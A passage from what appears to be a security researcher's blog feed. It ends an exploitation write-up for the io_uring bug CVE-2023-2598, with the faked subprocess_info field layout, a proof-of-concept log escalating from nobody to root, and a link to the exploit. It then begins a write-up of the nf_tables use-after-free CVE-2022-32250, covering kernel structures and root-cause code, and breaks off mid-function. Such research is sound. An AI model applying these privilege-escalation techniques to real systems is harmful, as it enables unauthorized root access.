<p>Two members in <code class="language-plaintext highlighter-rouge">sock</code> from which we can obtain a <em>self-pointer</em> are <code class="language-plaintext highlighter-rouge">sk_error_queue</code> and <code class="language-plaintext highlighter-rouge">sk_receive_queue</code> - both are the doubly linked list nodes. Both nodes <em>should</em> be in a linked list by themselves and therefore should contain pointers to themselves. It should be said that while I observed that both were in empty linked lists, <code class="language-plaintext highlighter-rouge">sk_error_queue</code> is said in the documentation to be “rarely used” - so it is the wiser choice for the leak.</p>

<p>After obtaining the address of our <code class="language-plaintext highlighter-rouge">sock</code> structure in memory, the rest is just a simple matter of calculating offsets.</p>

<h4 id="setting-up-subprocess_info-">Setting up subprocess_info <a name="subprocess_info"></a></h4>
<p>Let’s see how we are going to set the <code class="language-plaintext highlighter-rouge">subprocess_info</code> to escalate.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>work.data          &lt;-&gt; set to 0
work.entry.next    &lt;-&gt; set to it's own address
work.entry.prev    &lt;-&gt; set to the address of work.entry.next
work.func          &lt;-&gt; set to call_usermodehelper_exec_work
complete           &lt;-&gt; irrelevant
path               &lt;-&gt; don't overwrite or overwrite it with the same value
argv               &lt;-&gt; write the address where the argv array was set up
envp               &lt;-&gt; set to 0, we have no env variables
wait               &lt;-&gt; irrelevant
retval             &lt;-&gt; irrelevant
*init              &lt;-&gt; set to 0
*cleanup           &lt;-&gt; set to 0
data               &lt;-&gt; irrelevant
</code></pre></div></div>
<p>We must write <code class="language-plaintext highlighter-rouge">work.func</code> to hold <code class="language-plaintext highlighter-rouge">call_usermodehelper_exec_work</code>. As you remember we wrote the value of <code class="language-plaintext highlighter-rouge">proto-&gt;ioctl</code> to be <code class="language-plaintext highlighter-rouge">call_usermodehelper_exec</code>. The function <code class="language-plaintext highlighter-rouge">call_usermodehelper_exec</code> is responsible for queuing up our deferred work while <code class="language-plaintext highlighter-rouge">call_usermodehelper_exec_work</code> is called to handle the deferred work, when it comes time for it - so the function <code class="language-plaintext highlighter-rouge">call_usermodehelper_exec_work</code> is the one responsible for spawning our new process.</p>

<p>We write <code class="language-plaintext highlighter-rouge">path</code> to remain the same, the address of our <code class="language-plaintext highlighter-rouge">proto</code> structure.</p>

<p>After this is done, making an <code class="language-plaintext highlighter-rouge">ioctl</code> call to our socket to spawn our new shell is all that is left :)</p>

<h3 id="proof-of-concept-">Proof of Concept <a name="poc"></a></h3>
<p>Due to the astonishing primitive that this vulnerability gives us, the proof of concept is <em>extremely</em> reliable by nature.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
$ ./exploit
[*] CVE-2023-2598 Exploit by anatomic (@YordanStoychev)
memfd: 0, page: 0 at virt_addr: 0x4247000000, reading 266240000 bytes
memfd: 0, page: 500 at virt_addr: 0x42470001f4, reading 266240000 bytes
memfd: 0, page: 1000 at virt_addr: 0x42470003e8, reading 266240000 bytes
memfd: 0, page: 1500 at virt_addr: 0x42470005dc, reading 266240000 bytes
memfd: 0, page: 2000 at virt_addr: 0x42470007d0, reading 266240000 bytes
memfd: 0, page: 2500 at virt_addr: 0x42470009c4, reading 266240000 bytes
memfd: 0, page: 3000 at virt_addr: 0x4247000bb8, reading 266240000 bytes
memfd: 0, page: 3500 at virt_addr: 0x4247000dac, reading 266240000 bytes
memfd: 0, page: 4000 at virt_addr: 0x4247000fa0, reading 266240000 bytes
memfd: 0, page: 4500 at virt_addr: 0x4247001194, reading 266240000 bytes
memfd: 0, page: 5000 at virt_addr: 0x4247001388, reading 266240000 bytes
memfd: 0, page: 5500 at virt_addr: 0x424700157c, reading 266240000 bytes
memfd: 0, page: 6000 at virt_addr: 0x4247001770, reading 266240000 bytes
memfd: 0, page: 6500 at virt_addr: 0x4247001964, reading 266240000 bytes
memfd: 0, page: 7000 at virt_addr: 0x4247001b58, reading 266240000 bytes
memfd: 0, page: 7500 at virt_addr: 0x4247001d4c, reading 266240000 bytes
memfd: 0, page: 8000 at virt_addr: 0x4247001f40, reading 266240000 bytes
memfd: 0, page: 8500 at virt_addr: 0x4247002134, reading 266240000 bytes
memfd: 0, page: 9000 at virt_addr: 0x4247002328, reading 266240000 bytes
memfd: 0, page: 9500 at virt_addr: 0x424700251c, reading 266240000 bytes
memfd: 0, page: 10000 at virt_addr: 0x4247002710, reading 266240000 bytes
memfd: 0, page: 10500 at virt_addr: 0x4247002904, reading 266240000 bytes
memfd: 0, page: 11000 at virt_addr: 0x4247002af8, reading 266240000 bytes
memfd: 0, page: 11500 at virt_addr: 0x4247002cec, reading 266240000 bytes
memfd: 0, page: 12000 at virt_addr: 0x4247002ee0, reading 266240000 bytes
memfd: 0, page: 12500 at virt_addr: 0x42470030d4, reading 266240000 bytes
Found value 0xdeadbeefdeadbeef at offset 0x21c8
Socket object starts at offset 0x2000
kaslr_leak: 0xffffffffb09503f0
kaslr_base: 0xffffffffafe00000
found socket is socket number 1950
our struct sock object starts at 0xffff9817ff400000
fake proto structure set up at 0xffff9817ff400578
args at 0xffff9817ff400728
argv at 0xffff9817ff400750
subprocess_info set up at beginning of sock at 0xffff9817ff400000
calling ioctl...
/bin/sh: can't access tty; job control turned off
/ # id
uid=0(root) gid=0(root)
/ # w00t w00t
</code></pre></div></div>
<p>You can find my Proof of Concept - <a href="https://github.com/ysanatomic/io_uring_LPE-CVE-2023-2598">here</a>.</p>

<h2 id="acknowledgements-">Acknowledgements <a name="acknowledgements"></a></h2>
<p><a href="https://tholl.xyz/">Tobias Holl</a>, for outstanding research, discovering the vulnerability and PoC’ing it. Took the idea from him to use the the pacing rate of the socket as an egg :)</p>

<p><a href="https://chompie.rip/Home">Valentina Palmiotti (chompie)</a>, for her amazing introduction to the <code class="language-plaintext highlighter-rouge">io_uring</code> subsystem in her article, <a href="https://chompie.rip/Blog+Posts/Put+an+io_uring+on+it+-+Exploiting+the+Linux+Kernel#io_uring%20What%20is%20it?">Put an io_uring on it - Exploiting the Linux Kernel</a>.</p>]]></content><author><name></name></author><summary type="html"><![CDATA[A logic bug in io_uring leading to Local Privilege Escalation]]></summary></entry><entry><title type="html">Conquering a Use-After-Free in nf_tables: Detailed Analysis and Exploitation of CVE-2022-32250</title><link href="/cve-2022-32250/" rel="alternate" type="text/html" title="Conquering a Use-After-Free in nf_tables: Detailed Analysis and Exploitation of CVE-2022-32250" /><published>2023-02-04T14:00:00+00:00</published><updated>2023-02-04T14:00:00+00:00</updated><id>/cve-2022-32250</id><content type="html" xml:base="/cve-2022-32250/"><![CDATA[<h2 id="introduction">Introduction</h2>
<p>This article is a summarization of the research I recently conducted on <code class="language-plaintext highlighter-rouge">CVE-2022-32250</code>. 
Some (but not all) of my analysis and the process of exploiting the vulnerability were done live and can be found <a href="https://www.youtube.com/watch?v=McaJoyoHWVA&amp;list=PLIT_LTJ-NAyevg0Rb_5iV6uN7KX6uhc-_">here</a>.</p>

<p>My research sprung up from the <a href="https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/">write-up</a> by <a href="https://theori.io">theori.io</a>. I found their article extremely insightful and perfect for those who seek an overview of the vulnerability and the way it is exploited. Kudos to them!</p>

<p>In this write-up, I will be providing an in-depth look into the vulnerability and the way it is exploited.</p>

<p>As this is a Netfilter vulnerability I recommend reading my <a href="https://ysanatomic.github.io/netfilter_nf_tables/">article</a> that provides an introduction to the inner workings of <code class="language-plaintext highlighter-rouge">nf_tables</code>. However, I will try to cover everything you need to know.</p>

<h2 id="table-of-contents">Table of Contents</h2>
<ol>
  <li><a href="#background">Background</a>
    <ul>
      <li><a href="#sets">Sets</a></li>
      <li><a href="#lookup">Lookup Expression</a></li>
    </ul>
  </li>
  <li><a href="#vulnerability">The Vulnerability</a>
    <ul>
      <li><a href="#rootcause">Root Cause</a></li>
    </ul>
  </li>
  <li><a href="#exploitation">Exploitation</a>
    <ul>
      <li><a href="#requirements">Requirements</a></li>
      <li><a href="#heapaddr">Leaking a heap address</a>
        <ul>
          <li><a href="#heapaddrmethod">Method of Exploitation</a></li>
          <li><a href="#primitive">Searching for a primitive</a>
            <ul>
              <li><a href="#user_key_payload">struct user_key_payload</a></li>
            </ul>
          </li>
        </ul>
      </li>
      <li><a href="#defeatingkaslr">Defeating KASLR</a>
        <ul>
          <li><a href="#technique">Technique</a></li>
          <li><a href="#leaking">Leaking an address</a></li>
          <li><a href="#summarizingkaslr">Summarizing the KASLR leak process</a></li>
        </ul>
      </li>
      <li><a href="#escalating">Escalating via a modprobe_path overwrite</a>
        <ul>
          <li><a href="#escalatingmethod">Method of Exploitation</a></li>
          <li><a href="#overwritingmodprobe">Overwriting modprobe_path</a></li>
        </ul>
      </li>
    </ul>
  </li>
  <li><a href="#poc">Proof-of-Concept</a></li>
  <li><a href="#closing">Closing Remarks</a></li>
</ol>

<h2 id="background-">Background <a name="background"></a></h2>
<p>Before we take a look at the root cause we need to look at some background information that is needed to understand the vulnerability.</p>

<h3 id="sets-">Sets <a name="sets"></a></h3>
<p>In <code class="language-plaintext highlighter-rouge">nf_tables</code> are utilized the so-called <strong>Sets</strong>. The scope of their usage is vast but if we are to <em>extremely</em> simplify and generalize them - they are a fancy key-value store that sometimes acts just as a list.</p>

<p>A quick example of set usage is: Imagine you had a list of ports (22, 80, 443). If you want to drop all the packets that come on that port you would add those ports in a set and then use an <code class="language-plaintext highlighter-rouge">nft_lookup</code> expression to check if the incoming packet’s port number is part of the set - and if so drop it.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/**
 * 	struct nft_set - nf_tables set instance
 *
 *	@list: table set list node
 *	@bindings: list of set bindings
 *	@table: table this set belongs to
 *	@net: netnamespace this set belongs to
 * 	@name: name of the set
 *	@handle: unique handle of the set
 * 	@ktype: key type (numeric type defined by userspace, not used in the kernel)
 * 	@dtype: data type (verdict or numeric type defined by userspace)
 * 	@objtype: object type (see NFT_OBJECT_* definitions)
 * 	@size: maximum set size
 *	@field_len: length of each field in concatenation, bytes
 *	@field_count: number of concatenated fields in element
 *	@use: number of rules references to this set
 * 	@nelems: number of elements
 * 	@ndeact: number of deactivated elements queued for removal
 *	@timeout: default timeout value in jiffies
 * 	@gc_int: garbage collection interval in msecs
 *	@policy: set parameterization (see enum nft_set_policies)
 *	@udlen: user data length
 *	@udata: user data
 *	@expr: stateful expression
 * 	@ops: set ops
 * 	@flags: set flags
 *	@genmask: generation mask
 * 	@klen: key length
 * 	@dlen: data length
 * 	@data: private set data
 */</span>
<span class="k">struct</span> <span class="n">nft_set</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">list_head</span>		<span class="n">list</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">list_head</span>		<span class="n">bindings</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">nft_table</span>		<span class="o">*</span><span class="n">table</span><span class="p">;</span>
	<span class="n">possible_net_t</span>			<span class="n">net</span><span class="p">;</span>
	<span class="kt">char</span>				<span class="o">*</span><span class="n">name</span><span class="p">;</span>
	<span class="n">u64</span>				<span class="n">handle</span><span class="p">;</span>
	<span class="n">u32</span>				<span class="n">ktype</span><span class="p">;</span>
	<span class="n">u32</span>				<span class="n">dtype</span><span class="p">;</span>
	<span class="n">u32</span>				<span class="n">objtype</span><span class="p">;</span>
	<span class="n">u32</span>				<span class="n">size</span><span class="p">;</span>
	<span class="n">u8</span>				<span class="n">field_len</span><span class="p">[</span><span class="n">NFT_REG32_COUNT</span><span class="p">];</span>
	<span class="n">u8</span>				<span class="n">field_count</span><span class="p">;</span>
	<span class="n">u32</span>				<span class="n">use</span><span class="p">;</span>
	<span class="n">atomic_t</span>			<span class="n">nelems</span><span class="p">;</span>
	<span class="n">u32</span>				<span class="n">ndeact</span><span class="p">;</span>
	<span class="n">u64</span>				<span class="n">timeout</span><span class="p">;</span>
	<span class="n">u32</span>				<span class="n">gc_int</span><span class="p">;</span>
	<span class="n">u16</span>				<span class="n">policy</span><span class="p">;</span>
	<span class="n">u16</span>				<span class="n">udlen</span><span class="p">;</span>
	<span class="kt">unsigned</span> <span class="kt">char</span>			<span class="o">*</span><span class="n">udata</span><span class="p">;</span>
	<span class="cm">/* runtime data below here */</span>
	<span class="k">const</span> <span class="k">struct</span> <span class="n">nft_set_ops</span>	<span class="o">*</span><span class="n">ops</span> <span class="n">____cacheline_aligned</span><span class="p">;</span>
	<span class="n">u16</span>				<span class="n">flags</span><span class="o">:</span><span class="mi">14</span><span class="p">,</span>
					<span class="nl">genmask:</span><span class="mi">2</span><span class="p">;</span>
	<span class="n">u8</span>				<span class="n">klen</span><span class="p">;</span>
	<span class="n">u8</span>				<span class="n">dlen</span><span class="p">;</span>
	<span class="n">u8</span>				<span class="n">num_exprs</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">nft_expr</span>			<span class="o">*</span><span class="n">exprs</span><span class="p">[</span><span class="n">NFT_SET_EXPR_MAX</span><span class="p">];</span>
	<span class="k">struct</span> <span class="n">list_head</span>		<span class="n">catchall_list</span><span class="p">;</span>
	<span class="kt">unsigned</span> <span class="kt">char</span>			<span class="n">data</span><span class="p">[]</span>
		<span class="n">__attribute__</span><span class="p">((</span><span class="n">aligned</span><span class="p">(</span><span class="n">__alignof__</span><span class="p">(</span><span class="n">u64</span><span class="p">))));</span>
<span class="p">};</span>
</code></pre></div></div>
<p>Here it is important to note that expressions can be added to sets in <code class="language-plaintext highlighter-rouge">exprs</code> and to note the <code class="language-plaintext highlighter-rouge">bindings</code> linked list.</p>

<h3 id="lookup-expression-">Lookup Expression <a name="lookup"></a></h3>
<p>We already mentioned the existence of the <code class="language-plaintext highlighter-rouge">nft_lookup</code> expression… But what does it do?
The <strong>lookup</strong> expression is used to perform <em>lookups</em> into sets to check if a key or a value is present in the set.</p>

<p>Essentially in the example we provided after you set up your set with ports on which you want to drop packets, you will set up a lookup expression to perform the check on the incoming packets.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_lookup</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">nft_set</span>			<span class="o">*</span><span class="n">set</span><span class="p">;</span>
	<span class="n">u8</span>				<span class="n">sreg</span><span class="p">;</span>
	<span class="n">u8</span>				<span class="n">dreg</span><span class="p">;</span>
	<span class="n">bool</span>				<span class="n">invert</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">nft_set_binding</span>		<span class="n">binding</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>
<p>The parameter <code class="language-plaintext highlighter-rouge">set</code> holds a pointer to the set in which the lookup is going to be performed. <code class="language-plaintext highlighter-rouge">sreg</code> holds the register index where the <strong>key</strong> that we are looking up is going to be loaded from and <code class="language-plaintext highlighter-rouge">dreg</code> is the register index where <strong>value</strong> will be stored after the lookup if the key exists.
The final member is <code class="language-plaintext highlighter-rouge">binding</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_set_binding</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">list_head</span>		<span class="n">list</span><span class="p">;</span>
	<span class="k">const</span> <span class="k">struct</span> <span class="n">nft_chain</span>		<span class="o">*</span><span class="n">chain</span><span class="p">;</span>
	<span class="n">u32</span>				<span class="n">flags</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>
<p>Each lookup expression has a binding which contains a pointer to the <code class="language-plaintext highlighter-rouge">nft_chain</code> to which it belongs (if it belongs to a chain). It also has a <em>head</em> to a linked list. All of the expressions that look up into a set are in a linked list with each other (and the <em>set</em>) through their <code class="language-plaintext highlighter-rouge">bindings</code> (and the set’s <code class="language-plaintext highlighter-rouge">bindings</code> member).</p>

<p>So if we have two lookup expressions <code class="language-plaintext highlighter-rouge">lookup1</code> and <code class="language-plaintext highlighter-rouge">lookup2</code> that look up into a set called <code class="language-plaintext highlighter-rouge">set1</code> they would all be in a linked list.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* In case needed for clarity:
set1.bindings.next = lookup1.binding
lookup1.binding.next = lookup2.binding
lookup2.binding.next = set1.bindings

lookup2.binding.prev = lookup1.binding
lookup1.binding.prev = set1.bindings
set1.bindings.prev = lookup2.binding
*/</span>
</code></pre></div></div>

<h2 id="the-vulnerability-">The Vulnerability <a name="vulnerability"></a></h2>
<blockquote>
  <p>A use-after-free vulnerability was found in the Linux kernel’s Netfilter subsystem in net/netfilter/nf_tables_api.c. This flaw allows a local attacker with user access to cause a privilege escalation issue.</p>
</blockquote>

<h3 id="root-cause-">Root Cause <a name="rootcause"></a></h3>
<p>The problem arises when we add an <code class="language-plaintext highlighter-rouge">nft_lookup</code> expression to a set. To add a lookup expression to a set you have to use the <code class="language-plaintext highlighter-rouge">NFT_MSG_NEWSET</code> callback that calls the function <code class="language-plaintext highlighter-rouge">nf_tables_newset</code>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nf_tables_newset
	nft_set_elem_expr_alloc
		nft_expr_init
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">nf_tables_newset</code> calls <code class="language-plaintext highlighter-rouge">nft_set_elem_expr_alloc</code> which calls <code class="language-plaintext highlighter-rouge">nft_expr_init</code>.</p>

<p>Let’s take a deeper look at the <code class="language-plaintext highlighter-rouge">nft_expr_init</code> function.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="nf">nft_expr_init</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span>
                      <span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span><span class="n">nla</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">struct</span> <span class="n">nft_expr_info</span> <span class="n">expr_info</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="n">expr</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">module</span> <span class="o">*</span><span class="n">owner</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">err</span><span class="p">;</span>

    <span class="n">err</span> <span class="o">=</span> <span class="n">nf_tables_expr_parse</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">nla</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">expr_info</span><span class="p">);</span> 
    <span class="k">if</span> <span class="p">(</span><span class="n">err</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
        <span class="k">goto</span> <span class="n">err1</span><span class="p">;</span>

    <span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">ENOMEM</span><span class="p">;</span>
    <span class="n">expr</span> <span class="o">=</span> <span class="n">kzalloc</span><span class="p">(</span><span class="n">expr_info</span><span class="p">.</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">size</span><span class="p">,</span> <span class="n">GFP_KERNEL</span><span class="p">);</span> <span class="c1">// GFP_KERNEL space </span>
    <span class="k">if</span> <span class="p">(</span><span class="n">expr</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
        <span class="k">goto</span> <span class="n">err2</span><span class="p">;</span>

    <span class="n">err</span> <span class="o">=</span> <span class="n">nf_tables_newexpr</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">expr_info</span><span class="p">,</span> <span class="n">expr</span><span class="p">);</span> <span class="c1">// [1]</span>
		<span class="c1">// if the full intiatialization of the expression to a table: failed	</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">err</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> 
        <span class="k">goto</span> <span class="n">err3</span><span class="p">;</span> <span class="c1">// free *expr</span>

    <span class="k">return</span> <span class="n">expr</span><span class="p">;</span>
<span class="nl">err3:</span>
    <span class="n">kfree</span><span class="p">(</span><span class="n">expr</span><span class="p">);</span>
<span class="nl">err2:</span>
    <span class="n">owner</span> <span class="o">=</span> <span class="n">expr_info</span><span class="p">.</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">type</span><span class="o">-&gt;</span><span class="n">owner</span><span class="p">;</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">expr_info</span><span class="p">.</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">type</span><span class="o">-&gt;</span><span class="n">release_ops</span><span class="p">)</span>
        <span class="n">expr_info</span><span class="p">.</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">type</span><span class="o">-&gt;</span><span class="n">release_ops</span><span class="p">(</span><span class="n">expr_info</span><span class="p">.</span><span class="n">ops</span><span class="p">);</span>

    <span class="n">module_put</span><span class="p">(</span><span class="n">owner</span><span class="p">);</span>
<span class="nl">err1:</span>
    <span class="k">return</span> <span class="n">ERR_PTR</span><span class="p">(</span><span class="n">err</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>At <code class="language-plaintext highlighter-rouge">[1]</code> it calls the function <code class="language-plaintext highlighter-rouge">nf_tables_newexpr</code> to fully initialize an expression. If that fails it frees the expresion.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">nf_tables_newexpr</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span>
                 <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_expr_info</span> <span class="o">*</span><span class="n">expr_info</span><span class="p">,</span>
                 <span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="n">expr</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_expr_ops</span> <span class="o">*</span><span class="n">ops</span> <span class="o">=</span> <span class="n">expr_info</span><span class="o">-&gt;</span><span class="n">ops</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">err</span><span class="p">;</span>

    <span class="n">expr</span><span class="o">-&gt;</span><span class="n">ops</span> <span class="o">=</span> <span class="n">ops</span><span class="p">;</span> <span class="c1">// sets the ops of the expression to those expr_info-&gt;ops;</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">init</span><span class="p">)</span> <span class="p">{</span>
				<span class="c1">// does intialization</span>
        <span class="n">err</span> <span class="o">=</span> <span class="n">ops</span><span class="o">-&gt;</span><span class="n">init</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">expr</span><span class="p">,</span> <span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">**</span><span class="p">)</span><span class="n">expr_info</span><span class="o">-&gt;</span><span class="n">tb</span><span class="p">);</span> <span class="c1">// [2]</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">err</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
            <span class="k">goto</span> <span class="n">err1</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="nl">err1:</span>
    <span class="n">expr</span><span class="o">-&gt;</span><span class="n">ops</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
    <span class="k">return</span> <span class="n">err</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>At <code class="language-plaintext highlighter-rouge">[2]</code> we see that the expression specific <code class="language-plaintext highlighter-rouge">ops-&gt;init</code> function gets called and if it fails it returns the error to the caller - <code class="language-plaintext highlighter-rouge">nft_expr_init</code>. 
Each type of expression has its own <code class="language-plaintext highlighter-rouge">nft_expr_ops</code> defined. Let’s take a look at the <code class="language-plaintext highlighter-rouge">ops</code> of the lookup expression as we are talking about it.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_expr_ops</span> <span class="n">nft_lookup_ops</span> <span class="o">=</span> <span class="p">{</span>
	<span class="p">.</span><span class="n">type</span>		<span class="o">=</span> <span class="o">&amp;</span><span class="n">nft_lookup_type</span><span class="p">,</span>
	<span class="p">.</span><span class="n">size</span>		<span class="o">=</span> <span class="n">NFT_EXPR_SIZE</span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">nft_lookup</span><span class="p">)),</span>
	<span class="p">.</span><span class="n">eval</span>		<span class="o">=</span> <span class="n">nft_lookup_eval</span><span class="p">,</span>
	<span class="p">.</span><span class="n">init</span>		<span class="o">=</span> <span class="n">nft_lookup_init</span><span class="p">,</span>
	<span class="p">.</span><span class="n">activate</span>	<span class="o">=</span> <span class="n">nft_lookup_activate</span><span class="p">,</span>
	<span class="p">.</span><span class="n">deactivate</span>	<span class="o">=</span> <span class="n">nft_lookup_deactivate</span><span class="p">,</span>
	<span class="p">.</span><span class="n">destroy</span>	<span class="o">=</span> <span class="n">nft_lookup_destroy</span><span class="p">,</span>
	<span class="p">.</span><span class="n">dump</span>		<span class="o">=</span> <span class="n">nft_lookup_dump</span><span class="p">,</span>
	<span class="p">.</span><span class="n">validate</span>	<span class="o">=</span> <span class="n">nft_lookup_validate</span><span class="p">,</span>
	<span class="p">.</span><span class="n">reduce</span>		<span class="o">=</span> <span class="n">nft_lookup_reduce</span><span class="p">,</span>
<span class="p">};</span>
</code></pre></div></div>
<p>Here we can see that <code class="language-plaintext highlighter-rouge">ops-&gt;init</code> of the lookup expression is <code class="language-plaintext highlighter-rouge">nft_lookup_init</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">nft_lookup_init</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span>
               <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="n">expr</span><span class="p">,</span>
               <span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span> <span class="k">const</span> <span class="n">tb</span><span class="p">[])</span>
<span class="p">{</span>
    <span class="k">struct</span> <span class="n">nft_lookup</span> <span class="o">*</span><span class="n">priv</span> <span class="o">=</span> <span class="n">nft_expr_priv</span><span class="p">(</span><span class="n">expr</span><span class="p">);</span> 
    <span class="n">u8</span> <span class="n">genmask</span> <span class="o">=</span> <span class="n">nft_genmask_next</span><span class="p">(</span><span class="n">ctx</span><span class="o">-&gt;</span><span class="n">net</span><span class="p">);</span>
    <span class="k">struct</span> <span class="n">nft_set</span> <span class="o">*</span><span class="n">set</span><span class="p">;</span>
    <span class="n">u32</span> <span class="n">flags</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">err</span><span class="p">;</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">tb</span><span class="p">[</span><span class="n">NFTA_LOOKUP_SET</span><span class="p">]</span> <span class="o">==</span> <span class="nb">NULL</span> <span class="o">||</span>
        <span class="n">tb</span><span class="p">[</span><span class="n">NFTA_LOOKUP_SREG</span><span class="p">]</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
        <span class="k">return</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>

		<span class="c1">// sets up nft_set</span>
    <span class="n">set</span> <span class="o">=</span> <span class="n">nft_set_lookup_global</span><span class="p">(</span><span class="n">ctx</span><span class="o">-&gt;</span><span class="n">net</span><span class="p">,</span> <span class="n">ctx</span><span class="o">-&gt;</span><span class="n">table</span><span class="p">,</span> <span class="n">tb</span><span class="p">[</span><span class="n">NFTA_LOOKUP_SET</span><span class="p">],</span>
                    <span class="n">tb</span><span class="p">[</span><span class="n">NFTA_LOOKUP_SET_ID</span><span class="p">],</span> <span class="n">genmask</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">IS_ERR</span><span class="p">(</span><span class="n">set</span><span class="p">))</span>
        <span class="k">return</span> <span class="n">PTR_ERR</span><span class="p">(</span><span class="n">set</span><span class="p">);</span>

    <span class="p">...</span>
		<span class="c1">// gets the flags </span>
    <span class="n">priv</span><span class="o">-&gt;</span><span class="n">binding</span><span class="p">.</span><span class="n">flags</span> <span class="o">=</span> <span class="n">set</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">NFT_SET_MAP</span><span class="p">;</span>

		<span class="c1">// attempts to bind the expression to the set</span>
    <span class="n">err</span> <span class="o">=</span> <span class="n">nf_tables_bind_set</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">set</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">priv</span><span class="o">-&gt;</span><span class="n">binding</span><span class="p">);</span> <span class="c1">// [1]</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">err</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
        <span class="k">return</span> <span class="n">err</span><span class="p">;</span>

    <span class="n">priv</span><span class="o">-&gt;</span><span class="n">set</span> <span class="o">=</span> <span class="n">set</span><span class="p">;</span> 
    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">nf_tables_bind_set</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span> <span class="k">struct</span> <span class="n">nft_set</span> <span class="o">*</span><span class="n">set</span><span class="p">,</span>
               <span class="k">struct</span> <span class="n">nft_set_binding</span> <span class="o">*</span><span class="n">binding</span><span class="p">)</span>
<span class="p">{</span>
